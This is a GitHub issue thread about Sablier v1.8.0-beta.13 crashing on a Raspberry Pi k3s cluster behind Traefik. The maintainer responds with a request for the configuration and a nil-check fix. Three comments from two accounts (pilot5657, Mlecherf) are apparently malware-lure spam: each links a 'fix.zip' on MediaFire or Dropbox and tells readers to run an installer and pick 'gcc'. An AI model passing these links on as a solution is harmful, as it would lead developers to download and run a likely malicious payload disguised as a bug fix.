### ISSUE TITLE
v1.8.0-beta.13 image or latest beta tag image doesn't work on raspberry pi based kubernetes cluster.

### ISSUE THREAD

**Issue by ArKam** [sablierapp/sablier#380]
**Describe the bug**
When running sablier using image 1.8.0-beta.13 on a raspberry pi 4B 8Gb based kubernetes cluster, the container start correctly and is able to read the configuration file.
It however fail at the moment traefik send it a request.

**Context**
 - Sablier version: 1.8.0-beta.13 (latest versioned release available on docker hub).
 - Provider: Kubernetes - k3s-v1.29.2-arm64
 - Reverse proxy: Traefik v2.10.7 from helm chart v25.0.0
 - Sablier running inside a container? yes

**Expected behavior**
Sablier send the loading page back to traefik and scale up the endpoint.

**Additional context**
Here are the sablier container logs:
https://paste.opendev.org/show/bW8eB3f3oFViuUsnY5N3/

TBN: There are no errors on Traefik logs.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by acouvreur** [comment]
Can you provide more details with the whole configuration ?

The API is not that robust, and does do enough check to provide good errors to you and panics instead.

Maybe your missing a parameter or something else. This will be fixed in the future versions.

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by acouvreur** [comment]
I've created a pull request for this, it just adds a nil check on retruned instances.

This mean that it won't crash, but I expect some unexpected feedback from the dynamic ui.

Please share with me as soon as you can if this resolves your issue.
